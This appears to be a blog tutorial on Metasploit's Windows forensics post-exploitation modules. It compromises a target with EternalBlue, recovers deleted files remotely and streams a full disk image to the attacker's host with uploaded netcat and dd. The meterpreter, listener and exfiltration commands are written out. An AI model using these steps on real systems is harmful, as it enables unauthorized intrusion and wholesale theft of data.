Welcome back, my Metasploit Cyber Warriors!
Although Metasploit is an "exploitation framework" primarily used for hacking and penetration testing, it can also be used to provide some rudimentary forensic capabilities. It's primary usefulness as a forensic tool is to gather evidence from a remote system when the physical system is unavailable to the investigator. In some cases, this may be the only way to gather evidence when the physical location is unknown or unavailable to the investigator. The drawback, of course, is that depends upon transmission of data over a network, making this a very time consuming and tedious process. Despite this, it may be necessary in some circumstances, such as perpetrators from state-sponsored actors or other perpetrators beyond the jurisdiction of law enforcement.
The forensic modules in Metasploit were first developed by Wesley McGrew at Mississippi State University's National Forensics Training Center. Although these modules were very effective when they were developed, many have fallen at hard times as they have not kept up to date with new technology. Despite this, we will attempt to use those that work and develop a work around for those that do not.
Step #: Fire Up Kali
The first step, of course, is to fire up Kali and open a terminal. If we navigate to the appropriate directory in the Metasploit Framework, we can see there are 6 windows forensics modules (there are no forensic modules for other operating systems, but we will use a work around in Step #4 that should work for some other operating systems, particularly Linux).
kali > cd /usr/share/metasploit-framework/modules/post/windows/gather/forensics
kali > ls -l
Step #2: Enumerate Drives on the Target System
To begin our process of forensic analysis of the remote system, we will first need to compromise the system. This can be done in a number of ways, but here I have used the EternalBlue exploit against a Windows 7 system.
Once we have received the meterpreter prompt, we need to "background" the meterpreter and return to the msf prompt.
meterpreter> background
Note that Metasploit responds with the number of the session it has backgrounded. You will need that number shortly.
As part of our analysis process, we will need to first enumerate any storage devices on the system. There is a post exploitation module named;
post/windows/gather/forensics/enum_drives
Let's load it.
msf > use post/windows/gather/forensics/enum_drives
Now, we can show options to see what variables and parameters need to be set. It appears that we only need to set the SESSION.
msf > set SESSION 1
All that is left to do is to run the command "exploit" to enumerate the storage devices on the remote system.
msf > exploit
Note that this module identified two physical drives and three logical drives.
Step #3: Recover Deleted Files from the Target
Often, the perpetrator will delete key files (pictures, emails, documents, etc.) in an attempt to cover the tracks of their malicious activity. As we know, deleted files are not actually gone, but rather simply made available for being overwritten. The physical file still exits.
We can recover these files remotely from the target system with the post exploitation module;
post/windows/gather/forensics/recovery_files
msf > use post/windows/gather/forensics/recovery_files
After loading it, let's take a look at it options.
msf > show options
As you can see, this module will run with the default settings analyzing the C: drive. If you want to recover deleted files from a different drive, you will need to set the DRIVE parameter to reflect that (i.e. set DRIVE D:).
There is one option, TIMEOUT, that I found you may want to re-set. The default setting is to run this module for 3600 seconds or one hour. In my case, I doubled this time to two hours or 7200 seconds (the amount of time you need is dependent upon the size of the drive. As mentioned above, this is a slow, tedious process).
msf > set TIMEOUT 7200
After re-setting the TIMEOUT, simply enter exploit.
msf > exploit
Metasploit will now begin scouring that hard drive for deleted files. As you can see above, it found just one and gave it an ID of 3263873024.
To recover this deleted file, we must set the FILES parameter to that file number and exploit again.
msf > set FILES 3263873024
msf > exploit
As you can above in the screenshot, this module recovered the deleted file, transferred it to your system and saved it to the /root/.msf4/loot directory. There, you can find and examine the file that this perpetrator thought had been deleted and gone forever! This may be the key information in this case or contain secret or confidential information.
Step #4: Capture a Forensic Image of the Target System
In some cases, we may want to create an forensic image of the entire drive similar to what we would do with FTK Imager or other imaging tools. This would enable us to conduct a full scale forensic investigation with such forensic suites such as Autopsy, FTK or Encase.
Unfortunately, the imager tool developed by Wesley McGrew no longer seems to provide this capability. Fortunately, we at Hackers-Arise have developed a workaround to accomplish the same result.
With a Windows meterpreter on the target system, we can upload files. In this case, we will need two files to download a forensic image of the drive. The first is netcat and the second is the bit-by-bit disk copying utility, dd. As this is a Windows target system, we will need the Windows versions of both (if the target were a Linux system, there is good chance that both of these utilities are already built in). You can get the Windows version of netcat here and the windows version of dd here.
Now, upload both of these files to the target system.
meterpreter > upload nc.exe
meterpreter > upload dd
Next, on the Kali or attacker's system, open a netcat listener that will decompress (-d) the transmission with bzip and pipe it to dd. To summarize, we are opening a listener on Kali that the target system can communicate with on port 6996, decompress the data and send it to a file named "forensicimage".
kali > nc -l 6996 | bzip2 -d | dd bs=16M of=/dev/forensicimage
Now, on the meterpreter on the target Windows system, drop into a command shell.
meterpreter > shell
Last, navigate to the directory where you uploaded netcat and dd to. In my case, they are at C:\.
From here, we can now start dd on the target system capturing an image bit- by-bit, piping it to bzip2 for compression (-c) and then piping it out through netcat to our Kali system (192.168.1.103) to the listening port (6996).
C:\> dd bs=16M if=/dev/sda | bzip2 -c | nc 192.168.1.103 6996
Beware! This is a very slow and tedious process that will likely take many hours or days, but in the case where this is the only way to obtain evidence, it will likely be worth the wait. When this process is complete, you can begin the forensic analysis using your favorite forensic suite such as Autopsy, FTK or Encase.
Conclusion
Metasploit is primarily an exploitation framework, but over the years, its capabilities have continued to expand. As we saw in this tutorial, Metasploit can now be used to do some rudimentary digital forensics on a remote system such as recovering deleted files and creating a forensic image of the hard drive. Due to the time involved, this process only makes sense when the target system in not available for direct, physical analysis.